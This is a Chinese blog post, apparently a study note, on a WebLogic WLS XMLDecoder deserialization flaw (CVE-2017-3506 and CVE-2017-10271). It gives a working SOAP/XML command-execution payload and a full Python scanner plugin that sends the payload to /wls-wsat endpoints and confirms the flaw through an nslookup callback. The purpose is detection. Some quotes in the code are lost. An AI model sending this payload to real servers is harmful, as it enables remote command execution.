2. 程式人生 > >weblogic新漏洞學習cve-2017-3506

weblogic新漏洞學習cve-2017-3506

阿新 發佈:2017-12-27
pac 服務 sch window decode sin body for pro

一、原理:

  很明顯啦,readobject又出來背鍋了,一個XML的反序列化漏洞導致的命令執行。

  具體原理我看不懂java代碼的我也只能學習別人的分析。給出一篇參考文章,寫的非常詳細:

  漏洞原理

二、如何構造命令執行的payload-xml:

 1 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
 2     <soapenv:Header> 
 3         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"
 
>  
 4             <java version="1.8" class="java.beans.XMLDecoder"> 
 5                 <void class="java.lang.ProcessBuilder"> 
 6                     <array class="java.lang.String" length="3"> 
 7                         <void index="0"> 
 8                             <
 
string>nslookup</string> #命令名稱 
 9                         </void>  
10                         <void index="1"> 
11                             <string>%s</string> #巡風的隨機字符串,用來後面去查HTTP或者DNS log的flag字符串
12                         </void> 
13                         <
 
void index="2"> 
14                             <string>%s</string> #目標IP
15                         </void> 
16                     </array>  
17                 <void method="start"/>
18                 </void> 
19             </java> 
20         </work:WorkContext> 
21     </soapenv:Header>  
22     <soapenv:Body/> 
23 </soapenv:Envelope>

三、巡風的poc分析:

講一下驗證流程:

1、首先發包請求目標地址,如果目標地址返回存在banner信息:Web Services在報文中則進行下一步測試。 (首先得有weblogic啊)

2、發請求把XML內容 POST到目標主機去,休息2s後請求巡風的自己的WEB服務器上的http://%s:8088/{隨機字符串} 相當於記錄了NSLOOKUP的dnslog。如何查到了,返回結果有YES則存在漏洞,否則不存在。

  1 #!/usr/bin/python
  2 # coding:utf-8
  3 ‘‘‘
  4 巡風及巡風的插件基於python2
  5 主要有兩個函數:
  6 get_plugin_info() 返回插件信息
  7 check(ip, port, timeout) 接收IP,端口號及超時參數供巡風主程序調用,有返回值且返回值在判斷裏為True,即為漏洞存在,返回值即為本次的掃描結果,詳情請看接下來的函數實現
  8 ‘‘‘
  9 
 10 import random
 11 import urllib2
 12 import socket
 13 from time import sleep
 14 
 15 
 16 def get_plugin_info():
 17     ‘‘‘get_plugin_info 函數用於返回該插件和插件所檢測漏洞的信息‘‘‘
 18     plugin_info = {
 19         "name": "WebLogic WLS RCE CVE-2017-10271",
 20         "info": "Oracle WebLogic Server WLS安全組件中的缺陷導致遠程命令執行",
 21         "level": "高危",
 22         "type": "命令執行",
 23         "author": ".@sinosig",
 24         "url": "https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html",
 25         "keyword": "tag:weblogic",
 26     }
 27     return plugin_info
 28 
 29 
 30 def random_str(len):
 31     ‘‘‘返回隨機字符串‘‘‘
 32     str1 = ""
 33     for i in range(len):
 34         str1 += (random.choice("ABCDEFGH1234567890"))
 35     return str(str1)
 36 
 37 
 38 def get_ver_ip(ip):
 39     ‘‘‘返回當前服務器ip,當poc所用payload無回顯時,可以使用巡風輔助驗證的http服務和dns服務‘‘‘
 40     csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 41     csock.connect((ip, 80))
 42     (addr, port) = csock.getsockname()
 43     csock.close()
 44     return addr
 45 
 46 
 47 def check(ip, port, timeout):
 48     ‘‘‘本次poc的驗證的主函數,巡風會調用該函數進行漏洞檢測‘‘‘
 49     test_str = random_str(6)
 50     server_ip = get_ver_ip(ip)
 51     check_url = [/wls-wsat/CoordinatorPortType, /wls-wsat/CoordinatorPortType11]
 52 
 53     heads = {
 54         User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko),
 55         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,
 56         Accept-Language: zh-CN,zh;q=0.8,
 57         SOAPAction: "",
 58         Content-Type: text/xml;charset=UTF-8,
 59     }
 60 
 61     # 本次漏洞的payload
 62     # 本次命令執行漏洞的payload所觸發的response沒有明顯回顯和行為提供判斷,所以作者使用nslookup發送dns請求到get_ver_ip函數中取到的服務器地址,如果巡風服務器收到帶有random_str函數生成的隨機字符串的dns請求即可判斷為漏洞存在。
 63     post_str = ‘‘‘
 64         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
 65           <soapenv:Header> 
 66             <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
 67               <java version="1.8" class="java.beans.XMLDecoder"> 
 68                 <void class="java.lang.ProcessBuilder"> 
 69                   <array class="java.lang.String" length="3"> 
 70                     <void index="0"> 
 71                       <string>nslookup</string> 
 72                     </void>  
 73                     <void index="1"> 
 74                       <string>%s</string> 
 75                     </void> 
 76                     <void index="2"> 
 77                       <string>%s</string> 
 78                     </void> 
 79                   </array>  
 80                   <void method="start"/>
 81                 </void> 
 82               </java> 
 83             </work:WorkContext> 
 84           </soapenv:Header>  
 85           <soapenv:Body/> 
 86         </soapenv:Envelope>
 87                 ‘‘‘ % (test_str, server_ip)
 88     for url in check_url:
 89         target_url = http:// + ip + : + str(port) + url.strip()
 90         req = urllib2.Request(url=target_url, headers=heads)
 91         if Web Services in urllib2.urlopen(req, timeout=timeout).read():
 92             req = urllib2.Request(url=target_url, data=post_str, headers=heads)
 93             try:
 94                 urllib2.urlopen(req, timeout=timeout).read()
 95             except urllib2.URLError:
 96                 pass
 97             sleep(2)
 98             # 這裏請求 http://{巡風的地址}:8088/{本次生成隨機字符串} 如果返回YES,則證明服務器收到該請求,漏洞存在
 99             check_result = urllib2.urlopen("http://%s:8088/%s" % (server_ip, test_str), timeout=timeout).read()
100             if "YES" in check_result:
101                 return "Exist CVE-2017-10271"
102         else:
103             pass

weblogic新漏洞學習cve-2017-3506

相關推薦

weblogic漏洞學習cve-2017-3506

pac 服務 sch window decode sin body for pro 一、原理:   很明顯啦,readobject又出來背鍋了,一個XML的反序列化漏洞導致的命令執行。   具體原理我看不懂java代碼的我也只能學習別人的分析。給出一篇參考文章,寫的非常詳細

WebLogic中WLS 組件漏洞CVE-2017-10271)專項檢測工具

風險 bsp load 服務 app mage www 趨勢 新的 來源: 時間:2017-12-23 00:00:00 作者:  瀏覽:1929 次 近期安恒信息在應急響應過程中發現有惡意攻擊者利用WebLogic漏洞對企業服務器發起大範圍遠程攻擊,攻擊成功後植入挖

Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2017-10271)

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。 沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。 12.2.1.2.0下載: https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_

Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)檢測與利用復現

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。 漏洞環境搭建 可以參考: https://blog.csdn.net/q

WebLogic反序列化漏洞CVE-2017-3248)

使用Java 7和Java 8均可成功復現。 漏洞復現 先啟動weblogic(終端#1) ➜ base_domain ./startWebLogic.sh 在某埠監聽(接收反彈shell) ➜ ysoserial nc -klv 7777 Listeni

Nginx敏感信息泄露漏洞CVE-2017-7529)

泄露 內存 構造 一次 .com openss erro 這樣的 技術 2017年7月11日,為了修復整數溢出漏洞(CVE-2017-7529), Nginx官方發布了nginx-1.12.1 stable和nginx-1.13.3 mainline版本,並且提供了官方pa

隱藏17年的Office遠程代碼執行漏洞CVE-2017-11882)

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

[漏洞復現] CVE-2017-11882 通殺所有office版本

CVE-2017-11882 office漏洞 黑客 Kali Linux 滲透測試 1、漏洞概述這幾個月來,針對微軟Office套件最火熱最流行的攻擊手段,莫過於基於CVE-2017-11882的漏洞利用。2017年11月14號,微軟推送了常規的安全更新,其中,關於CVE-2017-11

[漏洞復現] CVE-2017-16995 Ubuntu16.04漏洞復現

黑客 漏洞復現 Kali Linux 滲透測試 Ubuntu 1、漏洞概述Ubuntu最新版本16.04存在本地提權漏洞,該漏洞存在於Linux內核帶有的eBPF bpf(2)系統調用中,當用戶提供惡意BPF程序使eBPF驗證器模塊產生計算錯誤,導致任意內存讀寫問題。 攻擊者(普通用戶)可

Samba遠程代碼執行漏洞CVE-2017-7494) 復現

51cto ucc 協議 samba配置文件 finished arc tin epo type 漏洞背景:Samba是在Linux和UNIX系統上實現SMB協議的一個軟件,2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號C

GoAhead Web伺服器遠端命令執行漏洞CVE-2017-17562)漏洞復現

一、漏洞概述: 1、漏洞簡介: GoAhead Web Server,它是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體,可以穩定地執行在Windows,Linux和

Nginx越界讀取快取漏洞CVE-2017-7529)

Nginx在反向代理站點的時候,通常會將一些檔案進行快取,特別是靜態檔案。快取的部分儲存在檔案中,每個快取檔案包括“檔案頭”+“HTTP返回包頭”+“HTTP返回包體”。如果二次請求命中了該快取檔案,則Nginx會直接將該檔案中的“HTTP返回包體”返回給使用者。如果我的請求中包

JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)

Red Hat JBoss Application Server 是一款基於JavaEE的開源應用伺服器。JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔

JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)

該漏洞為 Java反序列化錯誤型別,存在於 Jboss 的 HttpInvoker 元件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的資料流進行反序列化,從而導致了漏洞。 環境 JBoss 5.x/

ADB配置提權漏洞CVE-2017-13212)原理與利用分析

adb由於擁有shell許可權,因此僅在授權PC端後才可使用shell許可權,而通過該漏洞,可以實現在移動端獲取shell許可權,以致於可隨意刪除應用、螢幕截圖等等高許可權操作。不過移動端惡意應用程式必須能夠連線到adbd正在監聽的TCP埠,這就需要應用程式

Jboss反序列化漏洞復現(CVE-2017-12149)

Jboss反序列化漏洞復現(CVE-2017-12149) 一、漏洞描述 該漏洞為Java反序列化錯誤型別,存在於jboss的HttpInvoker元件中的ReadOnlyAccessFilter過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的資料流進行反序列化,從而導致了漏洞。 二、

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

[CVE-2017-5487] WordPress <=4.7.1 REST API 內容註入漏洞分析與復現

tps 文章 分析 請求 利用 api文檔 each includes 什麽 不是很新的漏洞,記錄下自己的工作任務 漏洞影響: 未授權獲取發布過文章的其他用戶的用戶名、id 觸發前提:wordpress配置REST API 影響版本:<= 4.7 0x01漏洞

CVE-2017-8464復現 (遠程快捷方式漏洞

遠程 們的 apach bject nom nbsp windows pre mage 我們的攻擊機IP是192.168.222.133   目標機IP是192.168.222.132 我們首先生成一個powershell msfvenom -p windows/x64/m

LNK文件(快捷方式)遠程代碼執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地